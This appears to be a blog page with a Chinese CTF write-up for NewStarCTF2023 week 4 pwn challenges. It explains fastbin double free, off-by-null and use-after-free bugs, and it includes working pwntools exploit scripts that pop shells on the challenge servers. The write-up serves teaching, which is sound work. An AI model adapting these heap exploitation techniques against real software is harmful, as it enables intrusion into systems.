<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  <meta name="baidu-site-verification" content="codeva-0Qx7wvY9gP" />
  
  <title>『NewStarCTF2023』_week4 PWN WP | C_LBY&#39;s BLOG</title>
  <meta name="author" content="鎏柏鱼">
  
  <meta name="description" content="新生赛复现，主要是为了复现堆题。">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="『NewStarCTF2023』_week4 PWN WP"/>
  <meta property="og:site_name" content="C_LBY&#39;s BLOG"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="C_LBY&#39;s BLOG" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  




<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">C_LBY&#39;s BLOG</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class="fa fa-rss"></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> 『NewStarCTF2023』_week4 PWN WP</h1>
		</div>
	



	<div class="row post">
		<!-- cols -->
		
			<div id="top_meta"></div>
			<div class="col-md-9">
				

							<!-- content -->
							<div class="mypage">
								
									<div class="alert alert-success description">
										<i class="fa fa-info-circle"></i> 新生赛复现，主要是为了复现堆题。
									</div> <!-- alert -->
									

										<h3 id="0x00-前言（patchelf的正确打开方式）"><a href="#0x00-前言（patchelf的正确打开方式）" class="headerlink" title="0x00 前言（patchelf的正确打开方式）"></a>0x00 前言（patchelf的正确打开方式）</h3><p>正好最近在学习堆入门，想起来去年还有newstar的题没复现完，所以干脆拿来当堆入门的练手了。但是在做完准备写wp用动调分析的时候遇到了一个问题。我的主力Linux是Ubuntu22，glibc版本是2.35，我学习堆也是从2.35开始往低版本对比学习，如果题目环境glibc不一样（一般都不一样，2.35版本太高了），则需要用patchelf来修改动态链接库以便gdb分析，但是按照网上的流程来patch怎么都不能成功。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">patchelf --set-interpreter ~/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 --set-rpath ~/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ Double</span></span><br></pre></td></tr></table></figure>

<p>假如我想用以上命令patch Double这个程序，运行这个程序的时候就会变成这样：</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/patchelf%E4%B8%8D%E6%88%90%E5%8A%9F.png" alt="patchelf不成功"></p>
<p>然后我问了xswlhhh师傅，只要将两个参数分开执行就行，也就是</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">patchelf --set-interpreter ~/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-linux-x86-64.so.2 Double</span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">patchelf --set-rpath ~/glibc-all-in-one/libs/2.23-0ubuntu3_amd64 Double</span></span><br></pre></td></tr></table></figure>

<p>这样就能成功patch了。</p>
<p><code>--set-interpreter</code>后面的参数是对应libc的解释器ld文件。注意是ld文件不是libc.so.6！！！</p>
<p><code>--set-rpath</code>后面的参数是对应libc的目录。然后最后是你要patch的程序。</p>
<h3 id="0x01-Double"><a href="#0x01-Double" class="headerlink" title="0x01 Double"></a>0x01 Double</h3><h5 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h5><p>这是一道经典菜单堆题，题目名字已经明显提示了要用double free，并且给出的libc版本是2.23，没有tcachebin，0x28大小的chunk释放完直接就会进fastbin。题目只有add和del两个可以操作chunk的函数，在add的同时可以向chunk写入内容。</p>
<p>现在题目有个后门，只要在0x604070出写入0x666就可以getshell，也就是要满足任意地址写。观察程序发现del函数里free完chunk之后没有置空指针，存在UAF漏洞，但是只能在add的时候编辑chunk内容。所以我们利用UAF来实现doublefree，然后伪造劫持fd，修改fastbin链表，达到申请到目标地址的目的。需要注意的是，fastbin链表中存的地址是chunk地址，也就是说，我们要写入fd的地址应该是target-0x10。</p>
<p>下面来思考利用方式。我们申请两个chunk，再释放掉这两个chunk之后，fastbin长这样：</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/Double_%E9%87%8A%E6%94%BE%E5%90%8Efastbin.png" alt="Double_释放后fastbin"></p>
<p>那么我们在申请一个chunk就会被分配到chunk0，也就是0x2442000处的chunk；申请第二个chunk则会申请到chunk1，第三个是chunk0。链表到此为止就结束了，因为如果我们在申请时向chunk写入了一些内容但并非有效指针，那他就不会再继续从fastbin里取出chunk。但是如果我们向chunk0中写入target-0x10的地址，因为我们释放了两次chunk0，这个fd对于链表中被取出的chunk0无效，但是对于未被取出的chunk0有效。所以申请第一个chunk后写入目标地址，然后申请两个垃圾chunk，再申请一个chunk就是我们想要的地址了，此时写入0x666就可以完成目标。</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/Double_%E5%8A%AB%E6%8C%81fd%E5%90%8E%E7%9A%84%E9%93%BE%E8%A1%A8.png" alt="Double_劫持fd后的链表"></p>
<p>(这个是另一个gdb了，所以地址不太一样，但是000结尾的是chunk0,030结尾的是chunk1)</p>
<h5 id="EXP："><a href="#EXP：" class="headerlink" title="EXP："></a>EXP：</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">r = remote(<span class="string">&quot;node5.buuoj.cn&quot;</span>, <span class="number">26771</span>)</span><br><span class="line"><span class="comment"># r = process(&quot;./Double&quot;)</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">launch_gdb</span>():</span><br><span class="line">    context.terminal == [<span class="string">&#x27;xdce4-terminal&#x27;</span>, <span class="string">&#x27;-x&#x27;</span>, <span class="string">&#x27;sh&#x27;</span>, <span class="string">&#x27;-c&#x27;</span>]</span><br><span class="line">    gdb.attach(proc.pidof(r)[<span class="number">0</span>])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx, content</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b&#x27;&gt;&#x27;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b&quot;Input idx&quot;</span>, idx)</span><br><span class="line">    r.sendafter(<span class="string">b&quot;Input content&quot;</span>, content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b&#x27;&gt;&#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b&quot;Input idx&quot;</span>, idx)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check</span>():</span><br><span class="line">    r.sendlineafter(<span class="string">b&#x27;&gt;&#x27;</span>, <span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">target = <span class="number">0x602070</span></span><br><span class="line"></span><br><span class="line">add(<span class="string">b&#x27;0&#x27;</span>, <span class="string">b&#x27;aaaaaaaa&#x27;</span>)</span><br><span class="line">add(<span class="string">b&#x27;1&#x27;</span>, <span class="string">b&#x27;bbbbbbbb&#x27;</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line">delete(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">delete(<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="string">b&#x27;2&#x27;</span>, p64(target-<span class="number">0x10</span>))</span><br><span class="line"><span class="comment"># launch_gdb()</span></span><br><span class="line">add(<span class="string">b&#x27;3&#x27;</span>, <span class="string">b&#x27;cccccccc&#x27;</span>)</span><br><span class="line">add(<span class="string">b&#x27;4&#x27;</span>, <span class="string">b&#x27;dddddddd&#x27;</span>)</span><br><span class="line">add(<span class="string">b&#x27;5&#x27;</span>, p64(<span class="number">0x666</span>))</span><br><span class="line"></span><br><span class="line">check()</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="0x02-game"><a href="#0x02-game" class="headerlink" title="0x02 game"></a>0x02 game</h3><h5 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h5><p>都是mihoyo害了出题人（不是<br>这道题很有意思，主要考察的是off by null的知识点，藏得蛮隐蔽的，可能是我对这种漏洞还不够熟悉。先来看看主函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall __noreturn <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v3; <span class="comment">// [rsp+0h] [rbp-20h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v4; <span class="comment">// [rsp+4h] [rbp-1Ch] BYREF</span></span><br><span class="line">  <span class="type">char</span> v5[<span class="number">8</span>]; <span class="comment">// [rsp+8h] [rbp-18h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v6; <span class="comment">// [rsp+10h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v7; <span class="comment">// [rsp+14h] [rbp-Ch]</span></span><br><span class="line">  <span class="type">int</span> v8; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line">  <span class="type">int</span> v9; <span class="comment">// [rsp+1Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  init();</span><br><span class="line">  v7 = <span class="number">0</span>;</span><br><span class="line">  choice(&amp;v6);</span><br><span class="line">  <span class="built_in">puts</span>(&amp;byte_2060);                             <span class="comment">// 现在你可以开始探险了</span></span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(a1);                               <span class="comment">// 扣1送原石</span></span><br><span class="line">        <span class="built_in">puts</span>(a2);                               <span class="comment">// 扣2送kfc联名套餐</span></span><br><span class="line">        __isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;v4);</span><br><span class="line">        <span class="keyword">if</span> ( v4 != <span class="number">1</span> )</span><br><span class="line">          <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">if</span> ( v6 == <span class="number">1</span> )                          <span class="comment">// 如果选了三月七则没得送原石</span></span><br><span class="line">        &#123;</span><br><span class="line">          <span class="built_in">puts</span>(<span class="string">&quot;no way!&quot;</span>);</span><br><span class="line">          <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> ( !v6 )</span><br><span class="line">        &#123;</span><br><span class="line">          v9 = <span class="number">1</span>;</span><br><span class="line">          v7 += <span class="number">0x10000</span>;</span><br><span class="line">          <span class="built_in">puts</span>(&amp;byte_20A8);                     <span class="comment">// 恭喜你完成一次委托</span></span><br><span class="line">          <span class="keyword">if</span> ( v7 &gt; <span class="number">0x3FFFF</span> )</span><br><span class="line">            <span class="built_in">printf</span>(&amp;format, &amp;system);           <span class="comment">// 打印出system的libc地址</span></span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">if</span> ( v4 != <span class="number">2</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">if</span> ( !v6 )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;no way!&quot;</span>);                        <span class="comment">// 选派蒙不能选KFC套餐</span></span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">if</span> ( v6 == <span class="number">1</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        v8 = <span class="number">1</span>;</span><br><span class="line">        <span class="built_in">puts</span>(&amp;byte_2108);                       <span class="comment">// 有什么想对肯德基爷爷说的吗?</span></span><br><span class="line">        myread(v5, <span class="number">8LL</span>);                        <span class="comment">// 把\n换成了\x00</span></span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( v4 != <span class="number">3</span> )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">if</span> ( v9 != <span class="number">1</span> || v8 != <span class="number">1</span> )                   <span class="comment">// 1,2两个选项至少要分别执行一遍,利用off by null来实现</span></span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;you are good mihoyo player!&quot;</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%hd&quot;</span>, &amp;v3);                 <span class="comment">// %hd是短整型</span></span><br><span class="line">    ((<span class="type">void</span> (__fastcall *)(<span class="type">char</span> *))((<span class="type">char</span> *)&amp;<span class="built_in">puts</span> - v3 - v7))(v5);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>choice函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">_DWORD *__fastcall <span class="title function_">choice</span><span class="params">(_DWORD *a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  _DWORD *result; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">int</span> v2; <span class="comment">// [rsp+1Ch] [rbp-4h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(&amp;s);                                     <span class="comment">// 请选择你的伙伴</span></span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;v2);</span><br><span class="line">  <span class="keyword">if</span> ( v2 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( v2 != <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;no way!&quot;</span>);                          <span class="comment">// 只能选1或0</span></span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>(&amp;byte_203D);                           <span class="comment">// 三月七</span></span><br><span class="line">    result = a1;</span><br><span class="line">    *a1 = <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(&amp;byte_2021);                           <span class="comment">// 派蒙</span></span><br><span class="line">    result = a1;</span><br><span class="line">    *a1 = <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>myread函数，也是这个程序的漏洞所在：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">myread</span><span class="params">(<span class="type">unsigned</span> __int8 *a1, <span class="type">int</span> a2)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+1Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( !a2 )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; a2; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)read(<span class="number">0</span>, a1, <span class="number">1uLL</span>) != <span class="number">1</span> )</span><br><span class="line">      <span class="keyword">return</span> <span class="number">1LL</span>;</span><br><span class="line">    <span class="keyword">if</span> ( *a1 == <span class="string">&#x27;\n&#x27;</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      *a1 = <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">return</span> *a1;</span><br><span class="line">    &#125;</span><br><span class="line">    *++a1 = <span class="number">0</span>;                                  <span class="comment">// off by null</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> (__int64)a1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h5 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h5><p>myread自定义了读取函数，对输入的字符串做了截断处理，但是强行增加一个截断符在字符串后面就导致了一个null字节的溢出。主函数中储存读取的字符串的数组是v5，长度是8，在栈上紧接着就是变量v6,用来储存角色的选择。所以也就是说这个off by null可以使v6变成0。<br>我们再来看主函数，首先选择角色，然后选择任务，但是对应角色只能做对应任务。其中选择派蒙，做满4次任务1就可以得到system地址，而选择三月七做任务2则可以触发myread函数的执行。在任务处如果选择3，如果1和2任务都做过，那么就可以执行&amp;puts - v3 - v7处的函数，并且以v5为参数。这里的puts地址指的是libc的地址，很容易就能想到构造system(&#x2F;bin&#x2F;sh)来getshell。但是角色只能选一次，想要两个任务都做到触发这个函数指针的调用，只能利用刚刚发现的off by null的漏洞。<br>首先角色先选1，然后做任务2，传入&#x2F;bin&#x2F;sh给v5，一定要保证输入字节够8个，才能溢出一个null给v6。这时候就可以做任务1了。如果题目附件没给libc文件，则需要做四次任务1来获得靶机的system地址以找到对应的libc版本。但是这里题目附件给了libc文件，所以直接通过symbols方法就能获取libc中puts和system的偏移，不需要真的执行4次（当然除非偏移很大真的需要或者你想要这么做除外。）这里需要注意一下一个地方，可能是我太久没做pwn题了，一开始思考偏移的时候我竟然想着要用extern段的相对位置，也就是下图0x4090和0x4058的差值。但是其实程序在运行时链接动态库后，这里会指向got表，也就是libc的地址，所以要找偏移要找libc中的偏移。</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/game_extern%E6%AE%B5.png" alt="game_extern段"></p>
<p>通过以下语句可以得到地址偏移是0x32190</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">libc = ELF(<span class="string">&quot;./libc-2.31.so&quot;</span>)</span><br><span class="line">log.success(<span class="built_in">hex</span>(libc.symbols[<span class="string">&#x27;puts&#x27;</span>]-libc.symbols[<span class="string">&#x27;system&#x27;</span>]))</span><br></pre></td></tr></table></figure>

<h5 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># r = process(&quot;./game&quot;)</span></span><br><span class="line">r = remote(<span class="string">&quot;node5.buuoj.cn&quot;</span>, <span class="number">28734</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc-2.31.so&quot;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">log.success(<span class="built_in">hex</span>(libc.symbols[<span class="string">&#x27;puts&#x27;</span>]-libc.symbols[<span class="string">&#x27;system&#x27;</span>]))  <span class="comment"># 0x32190</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sendla</span>(<span class="params">content</span>):</span><br><span class="line">    r.recv()</span><br><span class="line">    r.sendline(content.encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sendla(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">sendla(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">sendla(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">sendla(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">sendla(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">sendla(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">sendla(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">sendla(<span class="built_in">str</span>(<span class="number">0x2190</span>))</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="0x03-ezheap"><a href="#0x03-ezheap" class="headerlink" title="0x03 ezheap"></a>0x03 ezheap</h3><p>这题是看着官方WP复现的，主要漏洞是UAF，还学了一些新的知识。这题也是一道经典的菜单堆题。一共可以申请16个note，每个note由一个chunk来维护note信息，我们称为data，和一个chunk来储存note内容，我们把他叫做content。</p>
<h5 id="结构体的恢复"><a href="#结构体的恢复" class="headerlink" title="结构体的恢复"></a>结构体的恢复</h5><p>根据add函数的代码不难推测data用来存放一个结构体，前八个字节用来存size，最后八个字节用来存content的地址，中间则为0。我们可以在IDA中恢复这个结构体：</p>
<p>先在structure页面创建对应结构体<br><img src="https://c-lby.github.io/images/newstar_week4_wp/ezheap%E7%BB%93%E6%9E%84%E4%BD%93.png" alt="ezheap结构体"><br>然后将notebook的数据类型改为struct Data*<br><img src="https://c-lby.github.io/images/newstar_week4_wp/ezheap%E6%9B%B4%E6%94%B9%E7%BB%93%E6%9E%84%E4%BD%93%E7%B1%BB%E5%9E%8B.png" alt="ezheap更改结构体类型"><br>这样代码看起来会顺眼一点。</p>
<h5 id="UAF漏洞的利用"><a href="#UAF漏洞的利用" class="headerlink" title="UAF漏洞的利用"></a>UAF漏洞的利用</h5><p>程序还会将一个note的size存在notesize数组里，显然程序里会有一个关于size的简单的检查。我们再看delete函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">delete</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">signed</span> <span class="type">int</span> idx; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  idx = read_idx();</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)idx &lt; <span class="number">0x10</span> &amp;&amp; *(&amp;notebook + idx) )<span class="comment">// 没清空结构体</span></span><br><span class="line">    <span class="built_in">free</span>(*(&amp;notebook + idx));                   <span class="comment">// UAF漏洞，而且没释放写过的content的地址，只释放了notebook数据的chunk</span></span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Invalid index&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>UAF漏洞给了我们机会可以申请到某个note的data处，这样可以对data进行打印或者修改，达到读写的目的。因为delete的时候程序只释放了data而没有释放content，所以我们只要先释放两个note，然后再申请一个和data一样大小的note，这样新的content就是第一个释放的data。</p>
